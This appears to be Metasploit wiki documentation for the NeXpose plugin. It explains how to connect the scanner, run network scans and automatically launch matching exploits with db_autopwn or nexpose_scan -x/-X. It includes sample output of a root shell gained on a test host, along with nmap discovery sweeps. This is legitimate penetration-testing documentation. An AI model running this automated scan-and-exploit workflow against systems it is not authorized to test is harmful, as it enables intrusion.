NeXpose Plugin

Starting with version 3.3.1 Metasploit can integrate all editions of the Rapid7 NeXpose, including the free Community Edition. The current functionality provides the ability to run NeXpose scans from the Metaspoit console, cross-reference scan results with available Metasploit modules, and automatically launch the resulting exploits. The screen shot below shows an example of a basic automated scan + exploit session.

Table of Contents

  1. Introduction
  2. Quick Start Guide
  3. Discovery Mode
  4. Usage Guide

Implementation

This integration is in the form of a plugin that can be loaded into msfconsole (or msfweb). To use the nexpose plugin, an active database must be configured first. This can be accomplished using the db_create or db_connect commands, along with the db_driver command to set the database type. Once the database has been activated and the plugin loaded (load nexpose), a number of new commands become available in the console, all starting with the prefix nexpose_. Please the usage guide below for more information on each command.

Known Issues

  • The NeXpose service only allows a single authenticated session per user. If the nexpose plugin is configured with one user account and the user logs into the NeXpose web interface, the session used by the nexpose plugin will be invalidated. This works both ways, as a login by the nexpose plugin will invalidate the web session for the same user account. For commercial NeXpose users, the solution is to create a dedicated user account for the nexpose plugin to use. For Community Edition users, only one user account is allowed, so care must be taken when logging into the web interface while the plugin is active.
  • NeXpose uses a self-signed SSL certificate by default. Although this can be easily changed by the user, the plugin handles this by accepting any invalid certificate from the server. This can present a security issue if an attacker can sit between the user and the NeXpose service. The nexpose plugin will warn the user and require additional input if a non-local (127.0.0.1) NeXpose service is used.
  • The plugin does not handle the case where NeXpose is running in diagnostic mode due to an incomplete installation or missing activation license. In this situation the plugin will return an error during when the nexpose_connect command is executed.

Quick Start

  1. Install NeXpose following the guide on the NeXpose Community page.
  2. Download and install the latest version of Metasploit. You will need Metasploit 3.3.1 in order to integrate with NeXpose.
  3. Start NeXpose and then launch the Metasploit Console (msfconsole)
  4. Enable a database backend to store NeXpose scan results
    msf> db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /home/username/.msf3/sqlite3.db
  5. Load the NeXpose plugin
    msf> load nexpose                            
[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose
  6. Connect to the running NeXpose instance
    msf> nexpose_connect <USERNAME>:<PASSWORD>@127.0.0.1
[*] Connecting to NeXpose instance at 127.0.0.1:3780 with username <USERNAME>...
  7. Run a NeXpose scan and import the results
    msf > nexpose_scan 192.168.0.100
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
  8. Cross-reference exploit modules with results
    msf > db_autopwn -t -x
[*] Analysis completed in 1.6098849773407 seconds (5 vulns / 1777 refs)
[*] Matched exploit/linux/http/ddwrt_cgibin_exec against 192.168.0.100:80..
  9. Automatically launch exploit modules
    msf > db_autopwn -t -x -e -r

The last three steps can be combined into a single command:

msf > nexpose_scan -x 192.168.0.100
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
[*] Launching an automated exploitation session
(module output)
[*] Command shell session 1 opened (192.168.0.X:6480 -> 192.168.0.100:2101)

Successful exploits result in Metasploit sessions:

msf > sessions -l -v
Active sessions
===============
  Id  Description    Tunnel                                   Via
  --  -----------    ------                                   ---
  1   Command shell  192.168.0.X:9885 -> 192.168.0.100:2104  linux/http/ddwrt_cgibin_exec

msf > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(root)

Discovery

One of the current limitations of the Community Edition of Nexpose is the lack of a Discovery license. This can be avoided by taking advantage of the the NeXpose plugin's ability to use an existing Metasploit database of discovery results to launch NeXpose scans. In this scenario, the Metasploit database has been configured and another tool has been used to perform a discovery sweep of the target network. The example below demonstrates the use of Nmap to provide the initial discovery results. Since this example uses features of Nmap that require root or administrative privileges, the Metasploit console also needs to be launched as root for this particular example:

$ sudo msfconsole
msf> db_create myscan.db
msf> db_nmap -sP PS22,25,53,80,113,179,443,500,1352,1720,1723,3780,4443,8080,8000 -PA20,53,80,113,443,10043 -PP -PE 192.168.0.0/24

At this point, the database contains a list of hosts as discovered by Nmap. We can now use the NeXpose plugin to automatically scan the hosts identified by Nmap.

msf> load nexpose
msf> nexpose_connect <USERNAME>:<PASSWORD>@127.0.0.1
msf> nexpose_scan -d

If we only want to scan a small subset of the hosts identified by Nmap, we can use the -I parameter to the nexpose_scan command

 nexpose_scan -v -d -I 192.168.0.1-192.168.0.10

Usage Guide

Once the plugin has been loaded, entering help into the console will show the following new commands:

nexpose_connect Connect to a running NeXpose instance ( user:pass@host[:port] )
nexpose_activity Display any active scan jobs on the NeXpose instance
nexpose_scan Launch a NeXpose scan against a specific IP range and import the results
nexpose_disconnect Disconnect from an active NeXpose instance
nexpose_discover Launch a scan but only perform host and minimal service discovery
nexpose_dos Launch a scan that includes checks that can crash services and devices (caution)
nexpose_exhaustive Launch a scan covering all TCP ports and all authorized safe checks

nexpose_connect

The nexpose_connect command accepts a single argument that defines the username, password, host, and port number of the NeXpose scan engine to connect to. Only the username and password parameters are required, the host is defaulted to 127.0.0.1 and the port is defaulted to 3780. The syntax for the argument to this command is user:pass@host[:port]. Each of the following examples are correct: The nexpose_connect command accepts an alternate syntax for users with ":" or "@" in their password:
  • nexpose_connect admin s3r3tp@ss host port

nexpose_activity

The nexpose_activity command will query the server for active scan jobs. This is an excellent way to determine if another scan is already running before using the nexpose_scan command.

nexpose_scan

The nexpose_scan command is the workhorse of the nexpose plugin. This command accepts a large number of options:

nexpose_scan -h
OPTIONS:
    -h        This help menu
    -n <opt>  The maximum number of IPs to scan at a time (default is 32)
    -s <opt>  The directory to store the raw XML files from the NeXpose instance (optional)
    -t <opt>  The scan template to use (default:pentest-audit options:full-audit,exhaustive-audit,discovery,aggressive-discovery,dos-audit)
    -v        Display diagnostic information about the scanning process
    -x        Automatically launch all exploits by matching reference after the scan completes (unsafe)
    -X        Automatically launch all exploits by matching reference and port after the scan completes (unsafe)
    -P        Leave the scan data on the server when it completes (this counts against the maximum licensed IPs)
   <Address Range>

In the basic scenario of scanning a network range and importing the results, the usage would be:

msf> nexpose_scan 10.10.10.0/24

This would break the 256 IP range into 8 blocks of 32 IPs, scan each block, load the results, and discard the saved scan data on the NeXpose engine. Multiple IP ranges can be specified on the command-line and users of the paid editions of NeXpose can specify a larger number of hosts to scan in parallel via the -n parameter. Paid users can also create custom scan templates, which can be specified via the -t parameter to nexpose_scan. Once the scan completes, the results are stored in the local Metasploit database, which is used by the db_autopwn command among others to automate exploitation. The -x parameter will perform a 1:1 cross-reference of Metasploit modules to NeXpose scan results, launching any relevant exploits. The -X parameter goes ever farther by launching all possible exploits that use the same port number as the ports open on the targets. The -X mode will launch exploits that may be missed in the standard vulnerability cross-reference due to a lack of a safe vulnerability check.

nexpose_plugin.png (137.7 KB) HD Moore, 12/01/2009 08:13 am